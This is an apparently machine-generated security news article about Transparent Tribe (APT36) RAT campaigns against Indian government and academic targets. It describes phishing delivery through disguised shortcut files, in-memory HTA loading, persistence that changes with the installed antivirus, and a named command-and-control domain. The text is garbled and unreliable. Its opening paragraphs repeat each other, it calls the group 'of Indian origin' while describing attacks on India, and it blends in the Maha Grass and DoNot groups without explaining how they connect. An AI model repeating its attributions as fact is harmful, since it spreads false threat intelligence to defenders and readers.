Ethical Hacking News
Transparent Tribe has been linked to fresh attacks targeting Indian governmental, academic, and strategic entities with a remote access trojan (RAT) that grants persistent control over compromised hosts. The threat actor's arsenal of RATs has evolved over the years, with past variants including CapraRAT, Crimson RAT, ElizaRAT, and DeskRAT. APT36 remains a highly persistent and strategically driven cyber-espionage threat, with a sustained focus on intelligence collection targeting Indian government entities, educational institutions, and other strategically relevant sectors.
Transparent Tribe, a state-sponsored hacking group believed to be of Indian origin, has been linked to fresh attacks targeting Indian governmental, academic, and strategic entities. The latest attack uses a remote access trojan (RAT) that grants persistent control over compromised hosts, evading user suspicion with deceptive delivery techniques. The RAT employs ActiveX objects and WScript.Shell to interact with the Windows environment, demonstrating environment profiling and runtime manipulation. Transparent Tribe adapts its persistence method based on the antivirus solutions installed on the infected machine. It has been associated with another malware, StreamSpy Trojan, which uses WebSocket and HTTP protocols for C2 communication. The group targets Indian organizations, using tactics such as spear-phishing emails, malicious shortcut files, and Visual Basic Script to establish persistence and remote command execution.
Transparent Tribe, a state-sponsored hacking group believed to be of Indian origin, has been linked to fresh attacks targeting Indian governmental, academic, and strategic entities. The latest set of attacks employ a remote access trojan (RAT) that grants the threat actor persistent control over compromised hosts.
The RAT, used in conjunction with deceptive delivery techniques such as weaponized Windows shortcut files masquerading as legitimate PDF documents, allows Transparent Tribe to evade user suspicion. The threat actor's arsenal of RATs has been evolving over the years, with past variants including CapraRAT, Crimson RAT, ElizaRAT, and DeskRAT.
In the latest campaign, spear-phishing emails containing ZIP archives with LNK files disguised as PDFs are used to deliver the RAT payload. Once opened, the file triggers the execution of a remote HTML application (HTA) script using "mshta.exe," which decrypts and loads the final RAT payload directly in memory.
The HTA also downloads and opens a decoy PDF document to avoid arousing user suspicion. The script leverages ActiveX objects, particularly WScript.Shell, to interact with the Windows environment. This behavior demonstrates environment profiling and runtime manipulation, ensuring compatibility with the target system and increasing execution reliability techniques commonly observed in malware.
One notable aspect of the malware is its ability to adapt its persistence method based on the antivirus solutions installed on the infected machine. If Kaspersky is detected, it creates a working directory under "C:\Users\Public\core\" and writes an obfuscated HTA payload to disk. It establishes persistence by dropping a LNK file in the Windows Startup folder that launches the HTA script using "mshta.exe."
If Quick Heal or Avast, AVG, or Avira are detected, it works differently, establishing persistence by creating batch files and malicious LNK files in the Windows Startup folder. If no recognized antivirus solution is detected, it falls back to a combination of batch file execution, registry-based persistence, and payload deployment prior to launching the batch script.
Furthermore, Transparent Tribe has also been associated with another malware, StreamSpy Trojan, which uses WebSocket and HTTP protocols for C2 communication. The StreamSpy Trojan can harvest system information, establish persistence via Windows Registry, scheduled task, or via a LNK file in the Startup folder, communicate with the C2 server using HTTP and WebSocket.
The threat actor has been linked to several campaigns targeting Indian organizations in recent weeks. One such campaign leverages a malicious shortcut file disguised as a government advisory PDF to deliver a .NET-based loader, which then drops additional executables and malicious DLLs to establish remote command execution, system reconnaissance, and long-term access.
The shortcut is designed to execute an obfuscated command using cmd.exe to retrieve an MSI installer from a remote server. This sequence of actions extracts and displays a decoy PDF document, decodes and writes DLL files to specific locations on the victim's system, drops a malicious executable file, and establishes persistence by creating a Visual Basic Script that launches the malicious executable every time after system startup.
The DLL "wininet.dll" connects to a hard-coded command-and-control (C2) infrastructure hosted at dns.wmiprovider.com. It was registered in mid-April 2025 and implements multiple HTTP GET-based endpoints to establish communication with the C2 server, perform updates, and retrieve attacker-issued commands.
The emergence of StreamSpy Trojan and Spyder variants from the Maha Grass group indicates that the group is continuously iterating its arsenal of attack tools. The use of WebSocket channels for command issuance and result feedback aims to evade detection and censorship of HTTP traffic. Additionally, the correlated samples further confirm that the Maha Grass and DoNot attack groups have some connections in terms of resource sharing.
Transparent Tribe remains a highly persistent and strategically driven cyber-espionage threat, with a sustained focus on intelligence collection targeting Indian government entities, educational institutions, and other strategically relevant sectors. APT36's evolving arsenal of RATs and its ability to adapt to changing antivirus solutions make it a formidable opponent in the world of cyber espionage.
Related Information:
https://www.ethicalhackingnews.com/articles/New-RAT-Attacks-Target-Indian-Government-and-Academia-Transparent-Tribes-Evolving-Arsenal-ehn.shtml
Published: Fri Jan 2 08:04:56 2026 by llama3.2 3B Q4_K_M
